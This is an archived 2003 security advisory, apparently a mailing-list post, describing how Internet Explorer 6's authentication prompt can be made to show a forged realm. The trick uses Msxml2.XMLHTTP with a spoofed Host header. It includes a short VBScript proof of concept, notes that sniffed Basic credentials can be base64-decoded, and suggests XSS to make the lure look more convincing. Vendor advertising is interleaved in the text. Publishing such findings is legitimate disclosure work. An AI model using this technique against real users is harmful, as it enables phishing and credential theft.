Domain Name Forging On Authentication Prompt

• Win2k Server, fully patched, with IE 6.0
• Winxp, fully patched, with IE 6.0

  ---

  • Background *

When browsing to a folder/file that is protected by BASIC or NTLM authentication a window is displayed to the user, prompting for user credentials.

+------------------------------------------+

|  Please type your user name and password |

|  Site:        [IP/Host]                  |

|  Realm:       [Domain ]                  |

|  Username:    [       ]                  |

|  Password:    [       ]                  |


|                           [OK] [CANCEL]  |


+------------------------------------------+

• Details *

It is possible to use the Msxml2.XMLHTTP object to create a login box and set the realm to an arbitrary value.

Using the object to make a request to a URI that requires authentication and setting the HOST header to a domain of our choosing, the login prompt will be displayed using the HOST header value as the realm.

Aulthough the SITE displayed will be the IP of the URI (xxx.xxx.x.xx), unwary
users may trust the realm value and enter their login credentials.

By running a sniffer on the machine hosting the protected folder, it is possible to sniff the BASIC authorization string, which in turn can be base64
decoded to reveal the plaintext username:password pair.

This could be made more effective by using XSS to have the script appear to be running from a valid domain.

The sample script below should be enough to demonstrate.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Note: To bypass IE domain restrictions the ip of the protected folder needs to be the same as the site hosting the script.

[Code Sample]
<*script language="vbscript">
function sendinfo()
Dim myhttp

Set myhttp=CreateObject("Msxml2.XMLHTTP")

myhttp.open "GET", "
http://xxx.xxx.x.xx/_vti_bin/_vti_adm/admin.dll", false
myhttp.setRequestHeader "Host", "secure.foo.bar"
myhttp.send

set myhttp = Nothing
end function
</*script>
<*script>sendinfo()</*script>
[End Code Sample]

• Solution *

This issue is probably by design and as such the problem is with the end user
verifying the site that they are entering credentials for.

Brett Moore
Network Intrusion Specialist
security-assessment.com
+64-9-300-6494 Received on Fri May 9 12:27:38 2003